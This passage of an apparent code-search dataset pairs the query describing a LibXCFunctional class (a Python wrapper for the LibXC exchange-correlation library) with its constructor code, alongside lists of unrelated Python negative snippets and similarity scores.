y.shape[0]\n for y in x\n if y is not None and not is_tensor_or_composite_tensor(y)\n ])\n\n set_x = set_of_lengths(inputs)\n set_y = set_of_lengths(targets)\n set_w = set_of_lengths(weights)\n if len(set_x) > 1:\n raise ValueError('All input arrays (x) should have '\n 'the same number of samples. Got array shapes: ' +\n str([x.shape for x in inputs]))\n if len(set_y) > 1:\n raise ValueError('All target arrays (y) should have '\n 'the same number of samples. Got array shapes: ' +\n str([y.shape for y in targets]))\n if set_x and set_y and list(set_x)[0] != list(set_y)[0]:\n raise ValueError('Input arrays should have '\n 'the same number of samples as target arrays. '\n 'Found ' + str(list(set_x)[0]) + ' input samples '\n 'and ' + str(list(set_y)[0]) + ' target samples.')\n if len(set_w) > 1:\n raise ValueError('All sample_weight arrays should have '\n 'the same number of samples. Got array shapes: ' +\n str([w.shape for w in weights]))\n if set_y and set_w and list(set_y)[0] != list(set_w)[0]:\n raise ValueError('Sample_weight arrays should have '\n 'the same number of samples as target arrays. 
Got ' +\n str(list(set_y)[0]) + ' input samples and ' +\n str(list(set_w)[0]) + ' target samples.')", "def test_size_returns_length(dq_3):\n assert dq_3.size() == 3", "def LengthTest(arr):\n\tif len(arr) == 8:\n\t\treturn True;\n\telif len(arr) == 7:\n\t\treturn IsMissingField('cid', arr)\n\telse:\n\t\treturn False", "def __DimSiz_restriction_correct_ndarray_ndarray(self):\n\n strTestName = 'The size of a dimension of a Numpy array equals the size of a dimension of another Numpy array (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimEq('parameter1', 'aParameter1', 'columns', 'rows')\n\n RxCSObject.parameter1 = np.random.randn(5, 4, 3) # 5 pages, 4 rows, 3 columns *\n RxCSObject.aParameter1 = np.random.randn(3, 4) # 3 rows* , *2 columns\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def test_ndim(self):\r\n # 'ndim' is an optional integer parameter, specifying the length\r\n # of the 'shape', passed as a keyword argument.\r\n\r\n # ndim not specified, OK\r\n random = RandomStreams(utt.fetch_seed())\r\n fn = function([], random.uniform((2,2)))\r\n\r\n # ndim specified, consistent with shape, OK\r\n random2 = RandomStreams(utt.fetch_seed())\r\n fn2 = function([], random2.uniform((2,2), ndim=2))\r\n\r\n val1 = fn()\r\n val2 = fn2()\r\n assert numpy.all(val1 == val2)\r\n\r\n # ndim specified, inconsistent with shape, should raise ValueError\r\n random3 = RandomStreams(utt.fetch_seed())\r\n self.assertRaises(ValueError, random3.uniform, (2,2), ndim=1)", "def test_size():\r\n for sparse_type in ('csc_matrix', 'csr_matrix'):\r\n x = getattr(theano.sparse, sparse_type)()\r\n y = getattr(scipy.sparse, sparse_type)((5, 7)).astype(config.floatX)\r\n get_size = theano.function([x], x.size)\r\n\r\n def check():\r\n assert y.size == get_size(y)\r\n # We verify that the size is correctly updated as we store more data\r\n # into the sparse matrix (including zeros).\r\n check()\r\n y[0, 0] = 1\r\n check()\r\n y[0, 1] = 0\r\n check()", "def testLengthsOfFunction(self):\n\t\tfunc_len = len(self.d3.func_terms)\n\t\tself.assertEqual(3, func_len)", "def has_min_len(arr, len_, kind):\n arr_len = len(arr)\n if arr_len < len_:\n raise DimensionError(\n f'Your {kind} array must be at least {len_}, '\n f'but has only length {arr_len}!'\n )\n return True", "def __DimSiz_restriction_correct_ndarray_ndarray4(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to the size of a dimension of another Numpy array (4) (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 'aParameter1', 'pages', 'columns', mul=2)\n\n RxCSObject.parameter1 = np.random.randn(2, 3, 4) # * 5 pages, 3 rows, 4 columns\n RxCSObject.aParameter1 = np.random.randn(4, 3, 1) # 4 pages, 3 rows, * 1 column\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def test_smaller_iterable_len(self):\n with 
self.subTest(input='list'):\n self.assertEqual(get_n_chunks(self.test_data, iterable_len=5, chunk_size=None, n_splits=None, n_jobs=None),\n min(5, cpu_count() * 4))\n with self.subTest(input='numpy'):\n self.assertEqual(get_n_chunks(self.test_data_numpy, iterable_len=5, chunk_size=None, n_splits=None,\n n_jobs=None), min(5, cpu_count() * 4))\n with self.subTest(input='generator/iterator'):\n self.assertEqual(get_n_chunks(iter(self.test_data), iterable_len=5, chunk_size=None, n_splits=None,\n n_jobs=None), min(5, cpu_count() * 4))", "def __DimSiz_restriction_correct_ndarray_parameter(self):\n\n strTestName = 'The size of a dimension of a Numpy array equals a parameter (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('iParameter1', 'Int parameter')\n RxCSObject.paramType('iParameter1', int)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimEq('parameter1', 'iParameter1', 'pages')\n\n RxCSObject.iParameter1 = 1\n RxCSObject.parameter1 = np.random.randn(4, 3)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def test_bootstrap_array_shape():\n test_array = np.zeros((3, 4))\n test_axis = 1\n nboot = 5\n new_array = utils.bootstrap_array(test_array, nboot=nboot, axis=test_axis)\n shape = (3, 4, 5)\n assert shape == new_array.shape", "def __sizeof__(*args, **kwargs): # real signature unknown\n pass", "def __sizeof__(*args, **kwargs): # real signature unknown\n pass", "def __sizeof__(*args, **kwargs): # real signature unknown\n pass", "def __sizeof__(*args, **kwargs): # real signature unknown\n pass", "def __sizeof__(*args, **kwargs): # real signature unknown\n pass", "def __sizeof__(*args, **kwargs): # real signature unknown\n pass", "def _assert_is_batched(self, *arrays):\n shape_list = []\n for array in arrays:\n if isinstance(array, tf.Tensor):\n shape_list.append(array.shape.as_list())\n else:\n shape_list.append(np.shape(array))\n # All arrays should have at least two dimensions.\n assert all([len(shape) >= 2 for shape in shape_list])\n # All arrays should have the same batch size.\n assert len(set([shape[0] for shape in shape_list])) == 1", "def __DimSiz_restriction_incorrect_ndarray_ndarray3(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher than the size of a dimension of another Numpy array (3) (incorrect)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimH('parameter1', 'aParameter1', 'pages', 'pages', mul=2)\n\n RxCSObject.parameter1 = np.random.randn(8, 3, 4) # * 5 pages, 3 rows, *4 columns\n RxCSObject.aParameter1 = np.random.randn(4, 3, 1) # * 4pages, 3 rows, *1 column\n\n self.__parametersCheck_error(RxCSObject, DimSizError, strTestName)", "def test_has_correct_length(self) -> None:\n assert len(list(self._dataset)) == 7168", "def test_array() -> None:\n soup = generate_case(\"array\")\n\n tests.html_schema_doc_asserts.assert_property_names(soup, [\"fruits\", \"vegetables\", \"veggieName\", \"veggieLike\"])\n tests.html_schema_doc_asserts.assert_descriptions(\n soup,\n [\n \"A schema with an array\",\n \"The name of the vegetable.\",\n 
\"Do I like this vegetable?\",\n ],\n )\n tests.html_schema_doc_asserts.assert_types(\n soup, [\"object\", \"array of string\", \"string\", \"array\", \"object\", \"string\", \"boolean\"]\n )\n tests.html_schema_doc_asserts.assert_required(soup, [False, False, True, True])", "def check_array_ndim(arr, name, expected_ndim=2):\n # We just need to check that the number of dimensions if equal to expected_ndim\n ndim = len(arr.shape)\n check_value(is_valid=(ndim == expected_ndim), error_msg=\n 'The number of dimension of ' + name\n + ' is ' + str(ndim) + ' but is expected to be ' + str(expected_ndim))\n\n return arr", "def test_n_dim(self):\n with Pandas() as pd:\n if pd is None:\n return\n with Numpy() as np: # noqa\n if numpy is None:\n return\n sys.stderr.write(\"\\n\")\n\n df, hist1, hist2, hist3 = get_test_histograms1()\n hist0 = hg.Count()\n\n assert hist0.n_dim == 0\n assert hist1.n_dim == 1\n assert hist2.n_dim == 2\n assert hist3.n_dim == 3", "def __len__(self):\n return len(self.array)", "def __len__(self):\n return len(self.array)", "def array_dimensions(array):\n height = len(array)\n width = len(array[0])\n\n return width, height", "def __DimSiz_restriction_correct_ndarray_ndarray2(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower or equal to the size of a dimension of another Numpy array (2) (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 'aParameter1', 'columns', 2, mul=5)\n\n RxCSObject.parameter1 = np.random.randn(5, 3, 3) # 5 pages, 3 rows, *3 columns\n RxCSObject.aParameter1 = np.random.randn(4, 3, 1) # 4pages, 3 rows, *1 column\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def _check_size_of_lists(sequence_header, secstr_header):\n if len(sequence_header) != len(sequence):\n sys.exit(\"The size of the sequence list and sequence header doesn't match\")\n else:\n return True", "def _validate_array(\n mapping: Mapping[str, Any], ref: str, types: Set[str],\n depth: int) -> Optional[SchemaError]:\n minimum_size = mapping.get('minimum_size', None)\n maximum_size = mapping.get('maximum_size', None)\n if (minimum_size is not None and maximum_size is not None\n and minimum_size > maximum_size):\n return SchemaError(\n message=(\n \"Minimum size is larger than the maximum size: \"\n \"{} > {}\").format(minimum_size, maximum_size),\n ref='{}/minimum_size'.format(ref))\n\n return _validate_type_recursively(\n mapping=mapping['values'],\n ref='{}/values'.format(ref),\n types=types,\n depth=depth + 1)", "def assert_same_size(sequences):\n seq_size = len(sequences[0])\n for seq in sequences:\n if len(seq) != seq_size:\n raise SizeError", "def __sizeof__(self, ???):", "def __DimSiz_restriction_incorrect_ndarray_number2(self):\n\n strTestName = 'The number of rows of a Numpy array equals to a number (correct)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimEq('parameter1', 1, 'columns')\n\n RxCSObject.parameter1 = np.random.randn(3)\n\n self.__parametersCheck_error(RxCSObject, DimSizError, strTestName)", "def _check_array(X):\n return check_array(X,\n accept_sparse=['csr', 'csc'], # 
Accept sparse csr, csc\n order=None, # Do not enforce C or Fortran\n copy=False, # Do not trigger copying\n force_all_finite=True, # Raise error on np.inf/np.nan\n ensure_2d=True, # Force 'X' do be a matrix\n allow_nd=True, # Allow 'X.ndim' > 2\n warn_on_dtype=False # Mute as 'dtype' is 'None'\n )", "def debug_get_simple_size(self, _train=None, _validation=None):\n if np.any(_train):\n self.train_check = list()\n self.train_check.append(_train)\n if np.any(_validation):\n self.val_check = list()\n self.val_check.append(_validation)", "def test_get_length(t_list):\n if not get_length(t_list) == 10:\n raise ValueError(\"Wrong number of transactions\")", "def __DimSiz_restriction_incorrect_ndarray_ndarray_pedantic(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower than the size of a dimension of another Numpy array [pedantic] (incorrect)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimL('parameter1', 'aParameter1', 'rows', 'columns', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(3, 4) # *3 rows, 4 columns\n RxCSObject.aParameter1 = np.random.randn(3, 2) # 3 rows, * 2 columns\n\n self.__parametersCheck_error(RxCSObject, DimSizError, strTestName)", "def match_size(*arrays):\n target = arrays[0].datashape\n result = []\n\n # check for bad inputs\n for a in arrays:\n ds = a.datashape.copy()\n for i in range(min(a.ndim, target.ndim)):\n if ds.dim_low[i] < target.dim_low[i] or \\\n ds.dim_high[i] > target.dim_high[i]:\n raise ValueError(\"All array domains must be a subset \"\n \"of the first array's domain\")\n\n for a in arrays:\n ds = a.datashape.copy()\n ds.dim_low = list(ds.dim_low)\n ds.dim_high = list(ds.dim_high)\n\n for i in range(min(a.ndim, target.ndim)):\n ds.dim_low[i] = target.dim_low[i]\n ds.dim_high[i] = target.dim_high[i]\n if ds != a.datashape:\n a = a.redimension(ds.schema)\n result.append(a)\n\n return tuple(result)", "def __DimSiz_restriction_correct_ndarray_tuple(self):\n\n strTestName = 'The size of a dimension of a Numpy array equals the size of a tuple (correct) '\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('tParameter1', 'Tuple parameter')\n RxCSObject.paramType('tParameter1', tuple)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimEq('parameter1', 'tParameter1', 'pages', 1, mul=2, add=-1)\n\n RxCSObject.tParameter1 = (3, 4, 5, 6, 7)\n RxCSObject.parameter1 = np.random.randn(2, 2)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def __DimSiz_restriction_correct_ndarray_tuple_pedantic(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower than the size of a tuple [pedantic] (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('tParameter1', 'Tuple parameter')\n RxCSObject.paramType('tParameter1', tuple)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimL('parameter1', 'tParameter1', 'rows', 0, pedantic=1)\n\n 
RxCSObject.tParameter1 = (3, 4, 5, 6, 7)\n RxCSObject.parameter1 = np.random.randn(4, 2)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def __len__(self):\n return self._arr.shape[1]", "def __DimSiz_restriction_incorrect_ndarray_number_pedantic2(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower or equal to a number (2) [pedantic] (incorrect)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 2, 'rows', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(3, 3)\n\n self.__parametersCheck_error(RxCSObject, DimSizError, strTestName)", "def __DimSiz_restriction_incorrect_ndarray_number(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower or equal to a number (incorrect)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 3, 1) # Size of dimension 1 must be higher than 3'\n\n RxCSObject.parameter1 = np.random.randn(3, 4)\n\n self.__parametersCheck_error(RxCSObject, DimSizError, strTestName)", "def num_elements_eval_function_capped(individual, test_data, truth_data, name=None):\r\n return max(len(individual), 1707)", "def test_bytearray_respects_length(self):\n self._respects_length_test(bytearray)", "def __len__(self):\n n = 1\n for valTuple in self._valListOfLists:\n n *= len(valTuple)\n return n", "def ExceptionPropertyLength_test(type: str):\n m = pyflamegpu.ModelDescription(\"model\")\n ed = m.Environment()\n add_func = getattr(ed, f\"newPropertyArray{type}\")\n set_func = getattr(ed, f\"setPropertyArray{type}\")\n \n b = [0] * ARRAY_TEST_LEN\n _b1 = [0] * 1\n _b2 = [0] * (ARRAY_TEST_LEN + 1)\n _b3 = [0] * ARRAY_TEST_LEN * 2\n\n add_func(\"a\", b)\n with pytest.raises(pyflamegpu.FLAMEGPURuntimeException) as e:\n set_func(\"a\", _b1)\n with pytest.raises(pyflamegpu.FLAMEGPURuntimeException) as e:\n set_func(\"a\", _b2)\n with pytest.raises(pyflamegpu.FLAMEGPURuntimeException) as e:\n set_func(\"a\", _b3)\n # Added extra case to ensure that the above TypeErrors are not a result of the set_func not being found\n set_func(\"a\", b)", "def test_larger_iterable_len(self):\n with self.subTest(input='list'):\n self.assertEqual(get_n_chunks(self.test_data, iterable_len=25, chunk_size=None, n_splits=None, n_jobs=None),\n min(13, cpu_count() * 4))\n with self.subTest(input='numpy'):\n self.assertEqual(get_n_chunks(self.test_data_numpy, iterable_len=125, chunk_size=None, n_splits=None,\n n_jobs=None), min(100, cpu_count() * 4))\n with self.subTest(input='generator/iterator'):\n self.assertEqual(get_n_chunks(iter(self.test_data), iterable_len=25, chunk_size=None, n_splits=None,\n n_jobs=None), min(25, cpu_count() * 4))", "def test_results_length(spheroid_convex_fixture):\n assert(len(spheroid_convex_fixture.pairs) == 1000)\n assert(len(spheroid_convex_fixture.combinations) == 1000)\n assert(len(spheroid_convex_fixture.deltas) == 1000)" ]
[ "0.6265682", "0.620982", "0.61681736", "0.6165635", "0.612598", "0.6100851", "0.606523", "0.60568863", "0.6044883", "0.60175836", "0.6015358", "0.60039693", "0.599243", "0.59703016", "0.59418064", "0.5937286", "0.59317034", "0.59271264", "0.59253454", "0.5924653", "0.59069985", "0.5906962", "0.5898133", "0.58944845", "0.589207", "0.58866566", "0.58866566", "0.58866566", "0.58829695", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.5881784", "0.58656085", "0.5864605", "0.5860173", "0.58529484", "0.5824478", "0.5815255", "0.57947916", "0.5787374", "0.5743897", "0.57401043", "0.57379305", "0.5730442", "0.5709762", "0.57020426", "0.57016903", "0.5698339", "0.5698339", "0.5698339", "0.5698339", "0.5698339", "0.5698339", "0.5688884", "0.56886095", "0.5687448", "0.5683368", "0.56801105", "0.56550324", "0.5651036", "0.5651036", "0.5637659", "0.5626933", "0.5611403", "0.5611245", "0.5608458", "0.56079173", "0.56040835", "0.5594397", "0.55941635", "0.55894583", "0.5587027", "0.55767035", "0.5574732", "0.55720615", "0.5562287", "0.55583113", "0.5556561", "0.5552598", "0.5549568", "0.5549447", "0.554527", "0.55387354", "0.55368376" ]
0.5808242
54
The primary LibXCFunctional class used to build and compute DFT exchange-correlation quantities.
def __init__(self, func_name, spin): self.xc_func = None self._xc_func_init = False # Handle func_name if isinstance(func_name, str): func_id = util.xc_functional_get_number(func_name) if func_id == -1: raise KeyError("LibXCFunctional: name '%s' not found." % func_name) elif isinstance(func_name, (int, np.integer)): func_id = func_name if util.xc_functional_get_name(func_name) is None: raise KeyError("LibXCFunctional: ID '%d' not found." % func_name) else: raise TypeError("LibXCFunctional: func_name must either be a string or int. Got {}".format(func_name)) self._xc_func_name = util.xc_functional_get_name(func_id) # Handle spin if isinstance(spin, str): spin = spin.lower() if spin == "polarized": self._spin = 2 elif spin == "unpolarized": self._spin = 1 else: raise KeyError("LibXCFunctional: spin must either be 'polarized' or 'unpolarized' if represented by a string. Got {}".format(spin)) else: self._spin = spin if self._spin not in [1, 2]: raise KeyError("LibXCFunctional: spin must either be 1 or 2 if represented by a integer. Got {}".format(self._spin)) # Build the LibXC functional self.xc_func = core.xc_func_alloc() self.xc_func_size_names = [x for x in dir(self.xc_func.contents.dim) if not "_" in x] # Set all int attributes to zero (not all set to zero in libxc) for attr in self.xc_func_size_names: setattr(self.xc_func.contents, attr, 0) ret = core.xc_func_init(self.xc_func, func_id, self._spin) if ret != 0: raise ValueError("LibXC Functional construction did not complete. Error code %d" % ret) self._xc_func_init = True # Pull out all sizes after init self.xc_func_sizes = {} for attr in self.xc_func_size_names: self.xc_func_sizes[attr] = getattr(self.xc_func.contents.dim, attr) # Unpack functional info self.xc_func_info = core.xc_func_get_info(self.xc_func) self._number = core.xc_func_info_get_number(self.xc_func_info) self._kind = core.xc_func_info_get_kind(self.xc_func_info) self._name = core.xc_func_info_get_name(self.xc_func_info).decode("UTF-8") self._family = core.xc_func_info_get_family(self.xc_func_info) self._flags = core.xc_func_info_get_flags(self.xc_func_info) # Set needed flags self._needs_laplacian = self._flags & flags.XC_FLAGS_NEEDS_LAPLACIAN # Set derivatives self._have_exc = self._flags & flags.XC_FLAGS_HAVE_EXC self._have_vxc = self._flags & flags.XC_FLAGS_HAVE_VXC self._have_fxc = self._flags & flags.XC_FLAGS_HAVE_FXC self._have_kxc = self._flags & flags.XC_FLAGS_HAVE_KXC self._have_lxc = self._flags & flags.XC_FLAGS_HAVE_LXC # Set omega self._have_cam = self._flags & flags.XC_FLAGS_HYB_CAM self._have_cam |= self._flags & flags.XC_FLAGS_HYB_CAMY self._have_cam |= self._flags & flags.XC_FLAGS_HYB_LC self._have_cam |= self._flags & flags.XC_FLAGS_HYB_LCY self._cam_omega = self._cam_alpha = self._cam_beta = False if self._have_cam: self._cam_omega = self.xc_func.contents.cam_omega self._cam_alpha = self.xc_func.contents.cam_alpha self._cam_beta = self.xc_func.contents.cam_beta elif self._family in [flags.XC_FAMILY_HYB_LDA, flags.XC_FAMILY_HYB_GGA, flags.XC_FAMILY_HYB_MGGA]: self._cam_alpha = self.xc_func.contents.cam_alpha # VV10 self._have_vv10 = self._flags & flags.XC_FLAGS_VV10 self._nlc_b = self._nlc_C = False if self._have_vv10: self._nlc_b = self.xc_func.contents.nlc_b self._nlc_C = self.xc_func.contents.nlc_C # Stable self._stable = self._flags & flags.XC_FLAGS_STABLE self._dev = self._flags & flags.XC_FLAGS_DEVELOPMENT # Pull out references self._refs = [] self._bibtexs = [] self._dois = [] for pos in range(flags.XC_MAX_REFERENCES): ref = 
core.xc_func_info_get_references(self.xc_func_info, pos) if not ref: break self._refs.append(ref.contents.ref.decode("UTF-8")) self._bibtexs.append(ref.contents.bibtex.decode("UTF-8")) self._dois.append(ref.contents.doi.decode("UTF-8"))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_QFT(self):\n op = qml.QFT(wires=range(3))\n res = op.matrix()\n exp = QFT\n assert np.allclose(res, exp)", "def _function_class(self):\n return FriCASExpectFunction", "def calc_Cinv_FC(P_design_W, FC_cost_data):\n # if the Q_design is below the lowest capacity available for the technology, then it is replaced by the least\n # capacity for the corresponding technology from the database\n if P_design_W < FC_cost_data['cap_min'][0]:\n P_design_W = FC_cost_data['cap_min'][0]\n FC_cost_data = FC_cost_data[\n (FC_cost_data['cap_min'] <= P_design_W) & (FC_cost_data['cap_max'] > P_design_W)]\n\n Inv_a = FC_cost_data.iloc[0]['a']\n Inv_b = FC_cost_data.iloc[0]['b']\n Inv_c = FC_cost_data.iloc[0]['c']\n Inv_d = FC_cost_data.iloc[0]['d']\n Inv_e = FC_cost_data.iloc[0]['e']\n Inv_IR = FC_cost_data.iloc[0]['IR_%']\n Inv_LT = FC_cost_data.iloc[0]['LT_yr']\n Inv_OM = FC_cost_data.iloc[0]['O&M_%'] / 100\n\n InvC = Inv_a + Inv_b * (P_design_W) ** Inv_c + (Inv_d + Inv_e * P_design_W) * log(P_design_W)\n\n Capex_a_FC_USD = calc_capex_annualized(InvC, Inv_IR, Inv_LT)\n Opex_fixed_FC_USD = InvC * Inv_OM\n Capex_FC_USD = InvC\n\n return Capex_a_FC_USD, Opex_fixed_FC_USD, Capex_FC_USD", "def iot_obj_func(mol_fracs, x_mix, x_pure):\n \n x_mix = np.array(x_mix)\n x_pure = np.array(x_pure)\n calc_x_mix = np.dot(mol_fracs.reshape([1, len(mol_fracs)]), x_pure)\n return ((x_mix - calc_x_mix) ** 2).sum()", "def test_coefficients_jax_interface(self):\n import jax\n\n # Need to enable float64 support\n from jax.config import config\n\n remember = config.read(\"jax_enable_x64\")\n config.update(\"jax_enable_x64\", True)\n\n qnode = qml.QNode(self.circuit, self.dev, diff_method=\"parameter-shift\")\n\n weights = jax.numpy.array([0.5, 0.2])\n\n obtained_result = coefficients(partial(qnode, weights), 2, 1)\n\n assert np.allclose(obtained_result, self.expected_result)\n\n config.update(\"jax_enable_x64\", remember)", "def setUp(self):\n self.foreignAmount=1000.0\n self.fxFixingDate=Date(1,October,2018)\n self.familyName=\"ECB\"\n self.fixingDays=2\n self.sourceCurrency=USDCurrency()\n self.targetCurrency=EURCurrency()\n self.fixingCalendar=UnitedStates()\n self.todayDate=Date(11, November, 2018)\n self.tsDayCounter=Actual360()\n self.flatForwardUSD=FlatForward(self.todayDate, 0.005, self.tsDayCounter)\n self.sourceYts=RelinkableYieldTermStructureHandle(self.flatForwardUSD)\n self.flatForwardEUR=FlatForward(self.todayDate, 0.03, self.tsDayCounter);\n self.targetYts=RelinkableYieldTermStructureHandle(self.flatForwardEUR)\n self.fxindex=FxIndex(self.familyName,self.fixingDays,self.sourceCurrency,self.targetCurrency,self.fixingCalendar,self.sourceYts,self.targetYts)\n self.paymentDate=Date(1,November,2018)\n self.startDate=Date(1,October,2018)\n self.endDate=Date(1,November,2018)\n self.fixingDays=2\n self.gearing=1.0\n self.spread=0.0\n self.refPeriodStart=Date(1,October,2018)\n self.refPeriodEnd=Date(1,November,2018)\n self.dayCounter=Actual360()\n self.isInArrears=False\n self.tenor=Period(3,Months)\n self.settlementDays=2\n self.currency=GBPCurrency()\n self.floatIndex=USDLibor(self.tenor,self.sourceYts)\n self.undCpn = IborCoupon(self.paymentDate,self.foreignAmount, self.startDate,self.endDate,self.fixingDays,self.floatIndex,self.gearing,self.spread,self.refPeriodStart,self.refPeriodEnd,self.dayCounter)\n self.floatingratefxlinkednotionalcoupon=FloatingRateFXLinkedNotionalCoupon(self.fxFixingDate,self.foreignAmount,self.fxindex,self.undCpn)", "def _function_element_class(self):\n return FriCASFunctionElement", 
"def get_currency_exchange_daily(self, from_symbol, to_symbol, outputsize='compact'):\n _FUNCTION_KEY = 'FX_DAILY'\n return _FUNCTION_KEY, \"Time Series FX (Daily)\", 'Meta Data'", "def energy_function(self, x):\n \n return -T.dot(T.transpose(x), T.dot(self.W, x)) -\\\n T.dot(T.transpose(self.b), x)", "def test_implantation_flux_attributes():\n flux = 1\n imp_depth = 5e-9\n width = 5e-9\n distribution = (\n 1\n / (width * (2 * np.pi) ** 0.5)\n * sp.exp(-0.5 * ((festim.x - imp_depth) / width) ** 2)\n )\n expected_value = sp.printing.ccode(flux * distribution)\n\n my_source = festim.ImplantationFlux(\n flux=flux, imp_depth=imp_depth, width=width, volume=1\n )\n\n assert my_source.flux == flux\n assert my_source.imp_depth == imp_depth\n assert my_source.width == width\n assert my_source.value._cppcode == expected_value", "def initialize(context): \n \n \n \n context.Sentiment_multiplier = 1.7 #Number of times more bull messages than bear messages a stock must have had to be acceptable for trading\n # Create our dynamic stock selector.\n attach_pipeline(make_pipeline(context), 'my_pipeline')\n context.minCorr=0.2 #Minimum acceptable cross correlation value to make trades based on\n context.minCorr_short=.5 #Min acceptable cross correlation value (for short term tau) \n \n context.lookback=1800 #This is the number of minutes used during cross correlation of data. Note, that this should be less than 370 (390 trading day minutes - 20 min end of day stop) since we correlate same day data then trade based on those correlation. (Correlate first half the day, trade second half) \n # *****^ Same day correlation may be the best way to figure out tau, but it may be suboptimal for selecting commonly correlated stocks. This selection is more likely to make errors in picking stocks which have a coincidentally high correlation (just for one particular day). \n context.shortTau=180\n \n#Note, it may be ideal to select a tau based on the correlation method described below (just using the early half of the day) and to select likely correlated stocks seperately using a longer lookback time. ***\n#**********TODO*********************************************************\n #Methods of adding value to correlation:\n #Since we are trading on spike patterns only, it could be in our best interest to square (or even cube) the entire time series of a stock before normalizing it for (normalized) cross correlation. This would serve to exaggerate deviant values (high peaks). However, this would also underexaggerate drops, which we are interested in correlating as well. THEREFORE:\n #Correlate stocks by:\n #1.) 0 center the mean of the stock's time series. \n #2.) take the absolute value of the time series. - WHILE PRESERVING THE LOCATION (IDXS) OF NEGATIVE VALUES \n #3.) Square (or cubed the entire time series (thereby exaggerating both the peaks and drops in the time series.\n #4.) Reverse the absolute value transformation with the exagerated peaks and drops. \n #5.) Normalize and correlate. \n#**********************************************************************\n \n context.slope_lookback=20#Number of minutes used when determining sudden price change. 
\n context.perChange = .07 #Percent change over length of 1/3(context.slope_lookback) that would indicate a sudden price change (This is the percent change that trades will be made on) **May be best adjusted based on volatility***\n context.numTradeCombo=5 #Number of most correlated combinations we wish to keep.\n #TODO: lookback may be best adjusted daily, to account for long term change in ideal lookback time.\n context.timerList=[] #List of times of when to make a trade (unit in minutes from present)\n context.tradeList=[] #List of securities to trade \n context.actionList=[] #List of actions (buy = 1 default (no action) = 0 sell = -1)\n context.tradingNow=[] #List of whether or not a security pair is currently trading (abrupt change already detected (yes = 1 or no = 0)\n context.tempCash=0\n \n context.baseThresh=0 #Percent change used as a threshold for determining the time of the base of a spike. Also used to verify the presence of an occuring spike on the lag stock prior to purchase \n context.fallThresh=-.0001 #Rate at which fall has to occur before an end of spike has been indicated (Usually 0)\n \n #Sell all securities at the end of each trading day (5 minutes before close of 